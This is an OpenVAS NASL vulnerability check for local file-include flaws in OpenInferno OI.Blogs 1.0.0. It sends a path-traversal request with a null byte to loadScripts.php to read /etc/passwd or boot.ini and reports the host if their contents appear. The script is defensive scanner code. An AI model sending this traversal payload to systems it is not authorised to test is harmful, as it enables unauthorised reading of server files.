###############################################################################
# OpenVAS Vulnerability Test
# $Id: OpenInferno_38402.nasl 7190 2010-03-31 14:02:04Z chandra $
#
# OpenInferno OI.Blogs Multiple Local File Include Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100508);
 script_bugtraq_id(38402);
 script_version ("1.0-$Revision: 7190 $");
 script_tag(name:"risk_factor", value:"Medium");

 script_name("OpenInferno OI.Blogs Multiple Local File Include Vulnerabilities");

desc = "Overview:
OpenInferno OI.Blogs is prone to multiple local file-include
vulnerabilities because it fails to properly sanitize user-
supplied input.

An attacker can exploit these vulnerabilities to obtain
potentially sensitive information and execute arbitrary local
scripts in the context of the webserver process. This may allow
the attacker to compromise the application and the computer; other
attacks are also possible.

OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also
be affected.

References:
http://www.securityfocus.com/bid/38402
http://www.openinferno.com/page/OI-Blogs.html

Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if OpenInferno OI.Blogs is prone to Local File Include vulnerability");
 script_category(ACT_ATTACK);
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
 script_dependencies("find_service.nes", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
   
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

dirs = make_list("/blog","/oi",cgi_dirs());
files = make_list("etc/passwd","boot.ini");

foreach dir (dirs) {
   
  url = string(dir, "/index.php"); 
  req = http_get(item:url, port:port);
  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
  if( buf == NULL )continue;

  if(egrep(pattern: "Powered By (OI.Blog|OpenInferno)", string: buf, icase: TRUE)) {
    foreach file (files) {
      
      url = string(dir, "/sources/javascript/loadScripts.php?scripts=/../../../../../../../../../../../../../../../", file,"%00");
      req = http_get(item:url, port:port);
      buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

      if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string: buf)) {

        security_warning(port:port);
        exit(0);
      
      }
    }
  }
}

exit(0);

